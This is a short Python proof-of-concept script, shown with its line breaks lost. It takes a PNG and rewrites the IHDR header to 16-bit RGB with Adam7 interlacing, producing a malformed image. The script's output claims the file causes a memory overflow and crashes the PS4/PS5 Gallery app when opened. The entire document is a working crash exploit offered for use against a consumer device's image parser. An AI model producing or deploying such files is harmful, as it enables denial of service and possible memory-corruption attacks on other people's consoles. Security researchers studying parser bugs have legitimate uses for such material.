import struct import zlib import sys def make_exploit_png(input_png, output_png="poc.png"): with open(input_png, "rb") as f: data = f.read() # Check if it's a valid PNG file if not data.startswith(b"\x89PNG\r\n\x1a\n"): print("[-] Not a valid PNG file") return pos = 8 new_data = data[:8] width = 0 height = 0 while pos < len(data): if pos + 8 > len(data): break length = struct.unpack(">I", data[pos:pos+4])[0] chunk_type = data[pos+4:pos+8] if chunk_type == b"IHDR" and length >= 13: # Extract width and height width = struct.unpack(">I", data[pos+8:pos+12])[0] height = struct.unpack(">I", data[pos+12:pos+16])[0] # Force 16-bit RGB + Adam7 interlaced new_ihdr = struct.pack(">IIBBBBB", width, height, 16, # bit depth = 16 2, # color type = Truecolor (RGB) 0, # compression method 0, # filter method 1) # interlace method = Adam7 ihdr_chunk = b"IHDR" + new_ihdr crc = struct.pack(">I", zlib.crc32(ihdr_chunk) & 0xffffffff) new_data += struct.pack(">I", len(new_ihdr)) + ihdr_chunk + crc print(f"[+] Modified IHDR → {width}x{height} | 16-bit RGB | Interlaced (Adam7)") else: # Copy all other chunks unchanged chunk_end = pos + 12 + length if chunk_end > len(data): break new_data += data[pos:chunk_end] pos += 12 + length if chunk_type == b"IEND": break with open(output_png, "wb") as f: f.write(new_data) overflow_kb = ((width * height * 6) - (width * height * 4)) / 1024 print(f"[+] PNG saved: {output_png}") print(f" → Expected overflow size ≈ {overflow_kb:.1f} KB") print(" → Open it in PS4 PS5 Gallery → should trigger CE-34196-3 or instant crash") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python make_png.py ") sys.exit(1) make_exploit_png(sys.argv[1])